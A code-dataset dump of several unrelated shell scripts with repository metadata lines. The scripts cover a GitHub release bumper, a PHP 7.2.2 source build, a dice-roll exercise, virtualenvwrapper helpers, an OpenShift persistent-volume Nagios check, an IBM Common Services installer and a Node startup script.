git clone --recursive --quiet "git@github.com:nadeemahmad/dotfiles.git" "${BASE_DIR}"
bash "${BASE_DIR}/build.sh"
fi
# Load common configuration
if [ -f ~/.profile ]; then
source ~/.profile
fi
# Load zsh if it's available
if [ -x /usr/local/bin/zsh ]; then
exec -l /usr/local/bin/zsh
else
source ~/.bashrc
fi
| true
|
e83412e26e82a4739c8c78d4a2e1b87b487c3ed8
|
Shell
|
sharksync/sharktank
|
/create-github-release.sh
|
UTF-8
| 1,409
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Check dependencies.
set -e
xargs=$(which gxargs || which xargs)
# Validate settings.
[ "$TRACE" ] && set -x
CONFIG=$@
for line in $CONFIG; do
eval "$line"
done
# Define variables.
GH_API="https://api.github.com"
GH_REPO="$GH_API/repos/$owner/$repo"
GH_RELEASES="$GH_REPO/releases"
AUTH="Authorization: token $github_api_token"
WGET_ARGS="--content-disposition --auth-no-challenge --no-cookie"
CURL_ARGS="-LJO#"
# Validate token.
curl -o /dev/null -sH "$AUTH" $GH_REPO || { echo "Error: Invalid repo, token or network issue!"; exit 1; }
# Read latest release
releasesResponse=$(curl -sH "$AUTH" "$GH_RELEASES/latest")
# Get version of the last release
version=$(echo "$releasesResponse" | grep -oP '(?<="tag_name": ")[^"]*')
echo "Found version: $version"
nextVersion=$(echo $version | awk -F. -v OFS=. 'NF==1{print ++$NF}; NF>1{if(length($NF+1)>length($NF))$(NF-1)++; $NF=sprintf("%0*d", length($NF), ($NF+1)%(10^length($NF))); print}')
echo "Next version: $nextVersion"
# Create a new release
curl -sH "$AUTH" --data "{\"tag_name\":\"$nextVersion\",\"target_commitish\":\"master\",\"name\":\"$nextVersion\",\"body\":\"Release of version $nextVersion. You can deploy this version using https://s3-eu-west-1.amazonaws.com/io.sharksync.builds/$nextVersion/cloudformation.yaml\",\"draft\":false,\"prerelease\":false}" $GH_RELEASES
npm run-script grunt postBuild:$nextVersion
| true
|
35cd6a9baec84207b63784903afe456f7e50c015
|
Shell
|
remainlife/linux
|
/shell/lnmp_php-7.2.2.sh
|
UTF-8
| 3,190
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
# lnmp之php-7.2.2的安装
# author ctocode-zwj <982215226@qq.com>
# 判断用户或用户组是否存在,不存在则创建
user=www
group=www
#create group if not exists
egrep "^$group" /etc/group >& /dev/null
if [ $? -ne 0 ]
then
groupadd $group
fi
#create user if not exists
egrep "^$user" /etc/passwd >& /dev/null
if [ $? -ne 0 ]
then
useradd -g $group -s /sbin/nolgin $user
fi
yum -y install wget vim pcre pcre-devel openssl openssl-devel libicu-devel gcc gcc-c++ autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel ncurses ncurses-devel curl curl-devel krb5-devel libidn libidn-devel openldap openldap-devel nss_ldap jemalloc-devel cmake boost-devel bison automake libevent libevent-devel gd gd-devel libtool* libmcrypt libmcrypt-devel mcrypt mhash libxslt libxslt-devel readline readline-devel gmp gmp-devel libcurl libcurl-devel openjpeg-devel
rm -rf php-7.2.2
cp -frp /usr/lib64/libldap* /usr/lib/
if [ ! -f php-7.2.2.tar.gz ];then
#wget https://cn2.php.net/distributions/php-7.2.2.tar.gz
wget https://f.9635.com.cn/linux/php-7.2.2.tar.gz
fi
tar zxvf php-7.2.2.tar.gz
chmod -R 777 php-7.2.2
cd php-7.2.2
./configure --prefix=/alidata/server/php \
--with-config-file-path=/alidata/server/php/etc \
--enable-fpm \
--with-fpm-user=www \
--with-fpm-group=www \
--enable-mysqlnd \
--with-mysqli=mysqlnd \
--with-pdo-mysql=mysqlnd \
--enable-mysqlnd-compression-support \
--with-iconv-dir \
--with-freetype-dir \
--with-jpeg-dir \
--with-png-dir \
--with-zlib \
--with-libxml-dir \
--enable-xml \
--disable-rpath \
--enable-bcmath \
--enable-shmop \
--enable-sysvsem \
--enable-inline-optimization \
--with-curl \
--enable-mbregex \
--enable-mbstring \
--enable-intl \
--with-mcrypt \
--with-libmbfl \
--enable-ftp \
--with-gd \
--enable-gd-jis-conv \
--enable-gd-native-ttf \
--with-openssl \
--with-mhash \
--enable-pcntl \
--enable-sockets \
--with-xmlrpc \
--enable-zip \
--enable-soap \
--with-gettext \
--disable-fileinfo \
--enable-opcache \
--with-pear \
--enable-maintainer-zts \
--with-ldap=shared \
--without-gdbm \
CPU_NUM=$(cat /proc/cpuinfo | grep processor | wc -l)
if [ $CPU_NUM -gt 1 ];then
make ZEND_EXTRA_LIBS='-liconv' -j$CPU_NUM
else
make ZEND_EXTRA_LIBS='-liconv'
fi
make install
cd ..
cp ./php-7.2.2/php.ini-development /alidata/server/php/etc/php.ini
cp ./php-7.2.2/php-fpm-72 /etc/init.d/php-fpm-72
chmod a+x /etc/init.d/php-fpm-72
sed -i '$d' /alidata/server/php/etc/php.ini
cp /alidata/server/php/etc/php-fpm.conf.default /alidata/server/php/etc/php-fpm.conf
cp /alidata/server/php/etc/php-fpm.d/www.conf.default /alidata/server/php/etc/php-fpm.d/www.conf
cat > /usr/lib/systemd/system/php-fpm.service<<"EOF"
[Unit]
Description=The PHP FastCGI Process Manager
After=syslog.target network.target
[Service]
Type=simple
PIDFile=/alidata/server/php/var/run/php-fpm.pid
ExecStart=/alidata/server/php/sbin/php-fpm --nodaemonize --fpm-config /alidata/server/php/etc/php-fpm.conf
ExecReload=/bin/kill -USR2 $MAINPID
[Install]
WantedBy=multi-user.target
EOF
systemctl enable php-fpm.service
systemctl start php-fpm.service
sleep 5
| true
|
9da01594acb5bc24d53a30dfb374757614670ac9
|
Shell
|
maxkao/dotfiles-22
|
/etc/bash/07-bashrc.virtualenvwrapper.sh
|
UTF-8
| 7,543
| 3.640625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
### bashrc.virtualenvwrapper.sh
#
# Installing Virtualenvwrapper:
# apt:
# sudo apt-get install virtualenvwrapper
# pip:
# [sudo] pip install -U pip virtualenvwrapper
#
## Configure dotfiles/virtualenv root/prefix environment variables
# __WRK workspace root
# PROJECT_HOME virtualenvwrapper project directory (mkproject)
# WORKON_HOME virtualenvwrapper virtualenv prefix
# VIRTUAL_ENV=${WORKON_HOME}/${VIRTUAL_ENV_NAME}
# _APP=${VIRTUAL_ENV_NAME} #[/subpath]
# _SRC=${VIRTUAL_ENV}/${_APP}
# _WRD=${VIRTUAL_ENV}/${_APP}
function _setup_virtualenvwrapper_default_config {
export __WRK="${__WRK:-"${HOME}/workspace"}"
export PROJECT_HOME="${__WRK}"
export WORKON_HOME="${HOME}/.virtualenvs"
}
function _setup_virtualenvwrapper_dotfiles_config {
export __WRK="${__WRK:-"${HOME}/-wrk"}"
export PROJECT_HOME="${__WRK}"
export WORKON_HOME="${WORKON_HOME:-"${__WRK}/-ve37"}"
}
function _setup_virtualenvwrapper_dirs {
umask 027
mkdir -p "${__WRK}" || chmod o-rwx "${__WRK}"
mkdir -p "${PROJECT_HOME}" || chmod o-rwx "${PROJECT_HOME}"
mkdir -p "${WORKON_HOME}" || chmod o-rwx "${WORKON_HOME}"
}
function _setup_virtualenvwrapper_config {
# _setup_virtualenvwrapper_config() -- configure $VIRTUALENVWRAPPER_*
#export VIRTUALENVWRAPPER_SCRIPT="/usr/local/bin/virtualenvwrapper.sh"
#export VIRTUALENVWRAPPER_SCRIPT="${HOME}/.local/bin/virtualenvwrapper.sh"
export VIRTUALENVWRAPPER_HOOK_DIR="${__DOTFILES}/etc/virtualenvwrapper"
export VIRTUALENVWRAPPER_LOG_DIR="${PROJECT_HOME}/.virtualenvlogs"
if [ -n "${VIRTUALENVWRAPPER_PYTHON}" ]; then
if [ -x "/usr/local/bin/python" ]; then
export VIRTUALENVWRAPPER_PYTHON="/usr/local/bin/python"
elif [ -x "${HOME}/.local/bin/python" ]; then
export VIRTUALENVWRAPPER_PYTHON="${HOME}/.local/bin/python"
# elif "${VIRTUAL_ENV}/bin/python" ## use extra-venv python
fi
fi
if [ -x "/usr/local/bin/virtualenvwrapper.sh" ]; then
export VIRTUALENVWRAPPER_SCRIPT="/usr/local/bin/virtualenvwrapper.sh"
fi
# if [ -n "${__IS_MAC}" ]; then # for brew python
local _PATH="${HOME}/.local/bin:/usr/local/bin:${PATH}"
if [ -z "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
VIRTUALENVWRAPPER_SCRIPT=$( (PATH="${_PATH}"; command -v virtualenvwrapper.sh))
export VIRTUALENVWRAPPER_SCRIPT
fi
if [ -z "${VIRTUALENVWRAPPER_PYTHON}" ]; then
VIRTUALENVWRAPPER_PYTHON=$( (PATH="${_PATH}"; command -v python))
export VIRTUALENVWRAPPER_PYTHON
fi
unset VIRTUALENV_DISTRIBUTE
if [ -n "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
# shellcheck disable=1090
source "${VIRTUALENVWRAPPER_SCRIPT}"
else
echo "Err: VIRTUALENVWRAPPER_SCRIPT:=${VIRTUALENVWRAPPER_SCRIPT} # 404"
fi
}
function lsvirtualenvs {
# lsvirtualenvs() -- list virtualenvs in $WORKON_HOME
# if $1 is specified, run that command
# with each virtualenv path
cmd=( "${@}" )
(cd "${WORKON_HOME}" &&
for venv in $(ls -adtr "${WORKON_HOME}/"**/lib/python?.? | \
sed "s:$WORKON_HOME/\(.*\)/lib/python[0-9]\.[0-9]:\1:g"); do
if [ -n "${cmd[*]}" ]; then
"${cmd[@]}" "${venv}" ;
else
echo "${venv}" ;
fi
done)
}
function lsve {
# lsve() -- list virtualenvs in $WORKON_HOME
lsvirtualenvs "${@}"
}
function backup_virtualenv {
# backup_virtualenv() -- backup VIRTUAL_ENV_NAME $1 to [$2]
local venvstr="${1}"
local _date
_date="$(date +'%FT%T%z')"
bkpdir="${2:-"${WORKON_HOME}/_venvbkps/${_date}"}"
test -d "${bkpdir}" || mkdir -p "${bkpdir}"
archivename="venvstrbkp.${venvstr}.${_date}.tar.gz"
archivepath="${bkpdir}/${archivename}"
(cd "${WORKON_HOME}" || return; \
( tar czf "${archivepath}" "${venvstr}" \
&& echo "# archivename=${archivename}" ) \
|| (echo "err: ${venvstr} (${archivename})" >&2; return 2))
return $?
}
function backup_virtualenvs {
# backup_virtualenvs() -- backup all virtualenvs in $WORKON_HOME to [$1]
date=$(date +'%FT%T%z')
bkpdir=${1:-"${WORKON_HOME}/_venvbkps/${date}"}
echo BKPDIR="${bkpdir}"
test -d "${bkpdir}" || mkdir -p "${bkpdir}"
lsvirtualenvs
venvs=$(lsvirtualenvs)
(cd "${WORKON_HOME}" || return; \
for venv in ${venvs}; do
backup_virtualenv "${venv}" "${bkpdir}" \
2>> "${bkpdir}/venvbkps.err" \
| tee -a "${bkpdir}/venvbkps.list"
done)
cat "${bkpdir}/venvbkps.err"
echo BKPDIR="${bkpdir}"
}
function dx {
# dx() -- 'deactivate'
(declare -f 'deactivate' > /dev/null 2>&1 \
&& deactivate) || \
(declare -f 'dotfiles_postdeactivate' > /dev/null 2>&1 \
&& dotfiles_postdeactivate)
}
function _rebuild_virtualenv {
# rebuild_virtualenv() -- rebuild a virtualenv, leaving pkgs in place
# $1="$VENVSTR"
# $2="$VIRTUAL_ENV"
echo "rebuild_virtualenv()"
VENVSTR="${1}"
VIRTUAL_ENV=${2:-"${WORKON_HOME}/${VENVSTR}"}
_BIN="${VIRTUAL_ENV}/bin"
#rm -fv ${_BIN}/python ${_BIN}/python2 ${_BIN}/python2.7 \
#${_BIN}/pip ${_BIN}/pip-2.7 \
#${_BIN}/easy_install ${_BIN}/easy_install-2.7 \
#${_BIN}/activate*
pyver=$(python -c "import sys; print('{}.{}'.format(*sys.version_info[:2]))")
_PYSITE="${VIRTUAL_ENV}/lib/python${pyver}/site-packages"
find -E "${_PYSITE}" -iname 'activate*' -delete
find -E "${_PYSITE}" -iname 'pip*' -delete
find -E "${_PYSITE}" -iname 'setuptools*' -delete
find -E "${_PYSITE}" -iname 'distribute*' -delete
find -E "${_PYSITE}" -iname 'easy_install*' -delete
find -E "${_PYSITE}" -iname 'python*' -delete
declare -f 'deactivate' > /dev/null 2>&1 && deactivate
mkvirtualenv -i setuptools -i wheel -i pip "${VENVSTR}"
#mkvirtualenv --clear would delete ./lib/python<pyver>/site-packages
workon "${VENVSTR}" && \
we "${VENVSTR}"
_BIN="${VIRTUAL_ENV}/bin"
if [ "${_BIN}" == "/bin" ]; then
echo "err: _BIN=${_BIN}"
return 1
fi
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| xargs head -n1
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| LC_ALL=C xargs sed -i.bak -E 's,^#!.*python.*,#!'"${_BIN}"'/python,'
find "${_BIN}" -name '*.bak' -delete
find "${_BIN}" -type f | grep -v '.bak$' | grep -v 'python*$' \
| xargs head -n1
echo "
# TODO: adjust paths beyond the shebang
#${_BIN}/pip install -v -v -r <(${_BIN}/pip freeze)
#${_BIN}/pip install -r ${_WRD}/requirements.txt
"
}
function rebuild_virtualenv {
# rebuild_virtualenv() -- rebuild a virtualenv
# $1="$VENVSTR"
# $2="$VIRTUAL_ENV"
(set -x; _rebuild_virtualenv "${@}")
}
function rebuild_virtualenvs {
# rebuild_virtualenvs() -- rebuild all virtualenvs in $WORKON_HOME
lsve rebuild_virtualenv
}
_setup_virtualenvwrapper_dotfiles_config # ~/-wrk/-ve37 {-ve27,-ce27,-ce37}
function _setup_virtualenvwrapper {
# _setup_virtualenvwrapper_default_config # ~/.virtualenvs/
_setup_virtualenvwrapper_config
_setup_virtualenvwrapper_dirs
}
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
_setup_virtualenvwrapper
else
#if [ -z "${VIRTUALENVWRAPPER_SCRIPT}" ]; then
_setup_virtualenvwrapper
#fi
fi
| true
|
6a3fd6bc4cd426546798bca63bfaf36f1ee6b7a6
|
Shell
|
phpmanual/br
|
/.compile.sh
|
UTF-8
| 332
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
# make the script fail for any failed command
set -e
# make the script display the commands it runs to help debugging failures
set -x
svn checkout https://svn.php.net/repository/phpdoc/modules/doc-pt_BR doc-pt_BR 1> /dev/null \
&& tree -L 2 \
&& mkdir -p out \
&& ./generate-html.php > out/index.html
| true
|
f4cc8d00d7f987c1002bcb1bfa9d22d9a816238a
|
Shell
|
voteleobrown/homebase
|
/scripts/install_vundle.sh
|
UTF-8
| 409
| 2.53125
| 3
|
[] |
no_license
|
echo "Cloning Vundle repository to $HOME/.vim/bundle/Vundle.vim"
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
echo "Done."
echo "Deleting old Vundle configuration if present."
sed -i '/" BEGIN VUNDLE/,/" END VUNDLE/d' $HOME/.vimrc
echo "Inserting new configuration from vundle.txt."
cat vundle.txt >> $HOME/.vimrc
echo "Installing Vundle plugins."
vim +PluginInstall +qall
| true
|
299e4abaf6626ebad4a540bfb4181360214f110b
|
Shell
|
manbruh/MANBRUH
|
/bash/lab 2/improveddice.sh
|
UTF-8
| 1,593
| 4.3125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# this script rolls a pair of six-sided dice and displays both the rolls
#
# Task 1:
# put the number of sides in a variable which is used as the range for the random number
# put the bias, or minimum value for the generated number in another variable
# roll the dice using the variables for the range and bias i.e. RANDOM % range + bias
# Task 2:
# generate the sum of the dice
# generate the average of the dice
# display a summary of what was rolled, and what the results of your arithmetic were
# Tell the user we have started processing
echo "Enter number of sides:"
#echo command is used to print statement as it is in terminal
read sides
# read command accepts user input
echo "Enter minimum value as range for rolling:"
#echo command is used to print statement as it is in terminal
read min
# read command accepts user input
echo "Rolling..."
#echo command is used to print statement as it is in terminal
# roll the dice and save the results
die1=$(( RANDOM % $sides + $min ))
# $sides represents number of option and $min represents minimum value on dice
die2=$(( RANDOM % $sides + $min ))
sum=$(($die1 + $die2))
# generating sum of two rolled options namely stored as die1 and die2
echo "The sum is: $sum"
#echo command is used to print statement as it is in terminal
avg=$(($sum / 2))
# average of two number is sum/2. so dividing and displaying average of two rolled option.
echo "The average is: $avg"
#echo command is used to print statement as it is in terminal
echo "Rolled $die1, $die2"
#echo command is used to print statement as it is in terminal
| true
|
d3895c118799d98a6454fcd0647d3906448c0e72
|
Shell
|
jc1518/OpenShiftV3-Nagios-Plugin
|
/openshift_pv_check.sh
|
UTF-8
| 1,837
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/bash
# Monitor Openshift V3 persisent storage usage
project=$1
your_token='thisisyourtokenpleasekeepitsecure'
url='https://api.mycompany.openshift.com'
if [ -z $1 ]; then
echo "Project name is required"
exit 3
fi
export KUBECONFIG=/usr/local/nagios/libexec/kubeconfig
message_text="Disk Usage:"
message_exit=0
date > /tmp/ospv.log
/usr/bin/oc login $url --token=$your_token >> /tmp/ospv.log 2>&1
/usr/bin/oc project $project >> /tmp/ospv.log 2>&1
pods=$(/usr/bin/oc get pods | grep -v -e build -e NAME | awk '{print $1}')
for pod in $pods
do
volumes=$(/usr/bin/oc volume pod/$pod | grep 'mounted at' | grep -v 'kubernetes.io' | awk '{print $3}')
for volume in $volumes
do
usage=$(/usr/bin/oc exec $pod -- df -h $volume | awk '{print $5}' | tail -1 | cut -d'%' -f1)
if [ $usage -gt 80 ] && [ $usage -lt 90 ]; then
message_temp_exit=1
message_temp_text="Warning - $volume is $usage% full!"
elif [ $usage -ge 90 ]; then
message_temp_exit=100
message_temp_text="Critical - $volume is $usage% full!"
else
message_temp_exit=0
message_temp_text="OK - $volume is $usage% full."
fi
let message_exit=${message_exit}+${message_temp_exit}
message_text=${message_text}' '${message_temp_text}
done
done
echo "$message_text"
if [ $message_exit -ge 100 ]; then
exit 2
elif [ $message_exit -ge 1 ]; then
exit 1
elif [[ $(echo $message_text | grep -c full) -lt 1 ]]; then
exit 3
else
exit 0
fi
| true
|
9e45b2758df56070fee8f7cb58e9fc2bd052135b
|
Shell
|
ibm-avocados/docker-cp4i-2020.4
|
/scripts/install-cs.sh
|
UTF-8
| 4,660
| 3.609375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Copyright [2018] IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This function issues the CRD status command and looks for output with 5 separate lines each ending with "=True"
# It returns 0 if it finds these 5 lines or 1 otherwise (output doesn't match or status command fails)
checkCommonServiceCRDComplete() {
oc get CommonService common-service -n ibm-common-services >/dev/null 2>&1
if [[ $? -ne 0 ]]; then
echo "CommonService not ready yet"
return 1
else
echo "CommonService ready !"
return 0
fi
}
usage () {
echo "Usage:"
echo "install-cs.sh CLUSTER_NAME API_KEY ENTITLEMENT_REGISTRY_KEY"
}
if [ "$#" -ne 3 ]
then
usage
exit 1
fi
# Include utility functions
SCRIPT_PATH=$(dirname `realpath $0`)
source "$SCRIPT_PATH"/utils.sh
source "$SCRIPT_PATH"/vars.sh
# ACE DESIGNER CRD created flag.
COMMON_SERVICE_CRD_CREATED=0
echo "Installing Common Services ..."
echo ""
oc project >/dev/null 2>&1
if [ $? -ne 0 ]; then
echo "Need to authenticate again:"
echo "Authenticating with the cluster"
ibmcloud login --apikey $2 -r us-south
if [[ $? -ne 0 ]]; then
echo "Fatal error: login via ibmcloud cli"
exit 1
fi
sleep 2
ibmcloud oc cluster config --cluster $1 --admin
if [[ $? -ne 0 ]]; then
echo "Fatal error: cannot setup cluster access via ibmcloud cli config command"
exit 1
fi
else
echo "Still authenticated. Skipping authentication ..."
fi
# Check if successfully run already and exit w/success if it has
status=$(oc get cm cs-install-progress -n default -o "jsonpath={ .data['state']}" 2>/dev/null)
if [ "$status" = "complete" ]; then
echo "cs already completed successfully, skipping ..."
exit 0
elif [ "$status" != "started" ]; then
oc create cm cs-install-progress --from-literal=state=started -n default
if [ $? -ne 0 ]; then
echo "Fatal error: Could not create cs-install-progress config map"
exit 1
fi
fi
echo "Creating subscription to Common Services operator ..."
echo "Check if Common Services subscription exists ..."
oc get Subscription ibm-common-service-operator -n openshift-operators >/dev/null 2>&1
if [ $? -ne 0 ]; then
cat <<EOF | oc create -f -
apiVersion: operators.coreos.com/v1alpha1
kind: Subscription
metadata:
name: ibm-common-service-operator
namespace: openshift-operators
spec:
channel: stable-v1
installPlanApproval: Automatic
name: ibm-common-service-operator
source: opencloud-operators
sourceNamespace: openshift-marketplace
EOF
if [ $? -ne 0 ]; then
echo "Error creating subscription to Common Services operator"
exit 1
fi
# Give CSVs a chance to appear
echo "Wait 10 seconds to give CSVs a chance to appear"
sleep 10
else
echo "Subscription to ibm-common-service-operator already exists, skipping create ..."
sleep 2
fi
echo "Check for dependent operators to come up. Wait 15 minutes "
printf "Querying CSVs ..."
retry 60 checkCSVComplete $CS_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
retry 60 checkCSVComplete $CS_ODLM_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
retry 60 checkCSVComplete $CS_NAMESPACE_CSV ibm-common-services
if [ $? -ne 0 ]; then
echo "Error: timed out waiting for operators in openshift-operators project"
exit 1
fi
echo "Wait for CommonService to come up"
retry 60 checkCommonServiceCRDComplete
echo "Patching CommonService ..."
oc patch CommonService common-service --type merge -p '{"spec":{"size":"small"}}' -n ibm-common-services
if [ $? -ne 0 ]; then
echo "Error patching CommonService"
exit 1
fi
# Update install progress
oc create cm cs-install-progress --from-literal=state=complete -n default --dry-run=client -o yaml | oc apply -f -
if [ $? -ne 0 ]; then
echo "Fatal error: Could not create cs-install-progress config map in project default"
exit 1
else
echo "IBM Common Service successfully installed"
exit 0
fi
| true
|
0b91b78e43ce51ed6c35cf3bcb571d02cb668e5c
|
Shell
|
Ulyouth/TurboLearner
|
/Simulations/Sampling/genSamples.sh
|
UTF-8
| 8,274
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
###########################################################################
# NAME: genSamples.sh
# AUTHOR: Ulyouth
# DATE: 10.06.2020
# DESC: A script to generate sCO2 case samples using OpenFOAM for
# varying Myong-Kasagi model coefficients. The coefficients
# at the moment are: A*, Cd
#
# Note: Bash's basic calculator "bc" was used since native bash
# scripts do not support floating point calculations.
#
# USAGE: genSamples.sh [CSV] [CASE] [YPLUSM] [PRTM] [PRT]
# Where:
# CSV is a .csv file containing a description of the
# coefficients to be sampled. Syntax below.
# CASE is a folder containing the OpenFOAM code template
# for the case to be sampled.
# YPLUSM is the y+ model to be used:
# 0=normal, 1=semi-local-scaling, 2=Wallin&Johannson
# PRTM is the Prandtl model to be use:
# 0=constant, 1=Bae, 2=oos, 3=Tien, 4=TWL
# PRT is the turbulent Prandtl number.
#
# Example: ./genSamples.sh coeffs.csv 42F 2 4 0.85
#
# The syntax of the CSV file is [a b c d e f].
# Where:
# a is the name of the coefficient.
# b is the initial value.
# c is the final value.
# d is the step.
# e is to toggle activation. (0=inactive; 1=active)
# f is a placeholder for the simulation loop.
# Must be the same as 'a'.
###########################################################################
#
# Save the time of the simulation start.
#
t0=$(date +%s)
#
# Check the command line arguments.
#
if [ -z $1 ] || [ -z $2 ] || [ -z $3 ] || [ -z $4 ] || [ -z $5 ]; then
cat << EOF
DESC: A script to generate sCO2 case samples using OpenFOAM for
varying Myong-Kasagi model coefficients.
USAGE: genSamples.sh [CSV] [CASE] [YPLUSM] [PRTM] [PRT]
Where:
CSV is a .csv file containing a description of the
coefficients to be sampled. Syntax below.
CASE is a folder containing the OpenFOAM code template
for the case to be sampled.
YPLUSM is the y+ model to be used:
0=normal, 1=semi-local-scaling, 2=Wallin&Johannson
PRTM is the Prandtl model to be use:
0=constant, 1=Bae, 2=oos, 3=Tien, 4=TWL
PRT is the turbulent Prandtl number.
Example: ./genSamples.sh coeffs.csv 42F 2 4 0.85
The syntax of the CSV file is [a b c d e f]. Where:
a is the name of the coefficient
b is the initial value
c is the final value
d is the step
e is to toggle activation (0=inactive; 1=active)
f is a placeholder for the simulation loop.
Must be the same as 'a'.
EOF
exit 1
fi
#
# Define the model's static coefficients.
#
yPlus_Model=$3;
Prt_Model=$4;
Prt=$5;
#
# Define the names of the folder and path containing the OpenFOAM code for
# the desired case, and the locations of the RASProperties' file and where the
# sample results are saved.
#
case_folder=$2
bk_path="$(pwd)/${case_folder}"
case_path="${bk_path}_tmp"
RAS_path="${case_path}/constant/RASProperties"
dict_path="${case_path}/postProcessing/sampleDict"
echo
echo "Simulation case: ${case_folder}"
echo -n "Extracting coefficients from file ${1}. "
#
# Read from the CSV file the coefficients to be sampled.
#
while IFS=, read -ra line
do
for x in ${line[@]}
do
coeff_list=(${coeff_list[@]} $x)
done
coeff_count=$((coeff_count+1))
done < $1
i=$((${#coeff_list[@]}/coeff_count)) # Number of params in every coefficient array
echo "Number of coefficients: ${coeff_count}."
#
# Read the contents of the RASProperties' file.
#
RAS_file=$(<"${bk_path}/constant/RASProperties")
if [ -z "$RAS_file" ]; then
exit 1
fi
#
# Define the name of the simulation folder.
#
sim_folder=""
for (( x=0; x<=coeff_count-1; x++ )); do
if (( $((coeff_list[x*i+4])) == 1 )); then
sim_folder="${sim_folder}_${coeff_list[x*i+0]}"
fi
done
if [ -z "$sim_folder" ]; then
echo "Please select at least one coefficient to be sampled."
exit 1
else
sim_folder="_${case_folder}_${yPlus_Model}_${Prt_Model}_Prt=${Prt}${sim_folder}"
sim_path="$(pwd)/${sim_folder}"
echo "Creating simulation folder ${sim_folder} at $(pwd)."
mkdir -p "${sim_path}"
fi
echo -e "Starting simulation. Details of the simulation can be found at log_tmp.\n"
#
# Loop through the coefficient values.
#
for (( x=coeff_count-1,skip=0; x>=0; x-- )); do
# Skip the coefficient if signaled.
if (( $((coeff_list[x*i+4])) == 0 )); then
continue
else
# Check if the value should not be skept.
if (( $((skip)) == 0 )); then
#
# Reset the files in the case folder back to original state.
#
rm -rf "${case_path}"
cp -rf "${bk_path}" "${case_path}"
#
# Define the name of the sample folder, log info and code to be added
# to the RASProperties file.
#
sample_folder=""
log=""
nl=$'\n'
code="myMyongKasagiKECoeffs${nl}{"
code="${code}${nl} Prt ${Prt};"
code="${code}${nl} yPlus_Model ${yPlus_Model};"
code="${code}${nl} Prt_Model ${Prt_Model};"
for (( y=0; y<=coeff_count-1; y++ )); do
if (( $((coeff_list[y*i+4])) == 1 )); then
sample_folder="${sample_folder}_${coeff_list[y*i+0]}=${coeff_list[y*i+5]}"
fi
log="${log}${coeff_list[y*i+0]}=${coeff_list[y*i+5]}"
if (( y != coeff_count-1)); then
log="${log}, "
fi
code="${code}${nl} ${coeff_list[y*i+0]} ${coeff_list[y*i+5]};"
done
sample_path="$(pwd)/${sim_folder}/${sample_folder}"
mkdir -p "${sample_path}"
code="${code}${nl}}"
echo -n "${log}. "
#
# Write the RASProperties file with the current coefficients.
#
echo "${code}" >> $RAS_path
#
# Run the simulation for the given coefficients.
#
echo -n "[PENDING]"
mybuoyantPimpleFoam -case "${case_path}" > log_tmp
echo -en "\b\b\b\b\b\b\b\b\b" # Remove the 'Pending' message status.
#
# Generate the desired results from the sampleDict dictionary
# and extract the latest time of the simulation.
#
post_log=$(postProcess -case "${case_path}" -func sampleDict -latestTime)
latestTime=$(echo "${post_log}" | sed -n 's/Time = //p')
#
# Check if the simulation completed successfully.
#
if (( $(echo "${latestTime} > 1.7" | bc -l) )); then
# If yes, copy the result files to the sample folder.
mv "${dict_path}/${latestTime}" "${dict_path}/${sample_folder}"
# Obtain the error value of the current sample.
error=$(python "../Evaluation/evalSamples.py" "${case_folder}" "$(pwd)/params.csv" 0 0 2>&1)
cp -rf "${dict_path}/${sample_folder}/." "$sample_path"
echo "[SUCCESS: e=${error}, t=${latestTime}]"
else
# If not, copy the simulation log to the sample folder.
cp -rf "${case_path}/log" "$sample_path"
echo "[ERROR: Check sample log]"
fi
fi
# Reset the skip trigger.
skip=0
# Increase the current value.
coeff_list[x*i+5]=$(echo "${coeff_list[x*i+5]} + ${coeff_list[x*i+3]}" | bc -l)
# Check if the current value is greater than the final value.
if (( $(echo "${coeff_list[x*i+5]} > ${coeff_list[x*i+2]}" | bc -l) )); then
# Reset the current value back to the initial value.
coeff_list[x*i+5]=$(echo "${coeff_list[x*i+1]}" | bc -l)
# Signal that the next value should be skept, since it is a duplicate.
skip=1
else
# Go back to beginning of the coefficient list.
x=coeff_count
fi
fi
done
#
# Calculate the duration of the simulation.
#
tf=$(date +%s)
t=$(date -ud @$(( tf - t0 )) +"$(( (tf-t0)/(3600*24) )) days %H hours %M minutes %S seconds")
echo -e "\nSimulation completed in ${t}."
| true
|
3f669f3c1e7c15a3d479fdb8ef6195e168f2ce66
|
Shell
|
doct15/example-node
|
/bin/startup.sh
|
UTF-8
| 421
| 2.796875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
if [ -z "{{AWS_ACCESS_KEY_ID}}" ]; then
echo "AWS_ACCESS_KEY_ID is empty"
fi
if [ -z "{{AWS_SECRET_ACCESS_KEY}}" ]; then
echo "AWS_SECRET_ACCESS_KEY is empty"
fi
if [ -z "{{&S3_CONFIG_BUCKET}}" ]; then
echo "S3_CONFIG_BUCKET is empty"
fi
echo '{{&S3_CONFIG_BUCKET}}'
aws s3 sync {{&S3_CONFIG_BUCKET}} /data/apps/prod/module-service/conf
ls /data/apps/prod/module-service/conf
npm start
| true
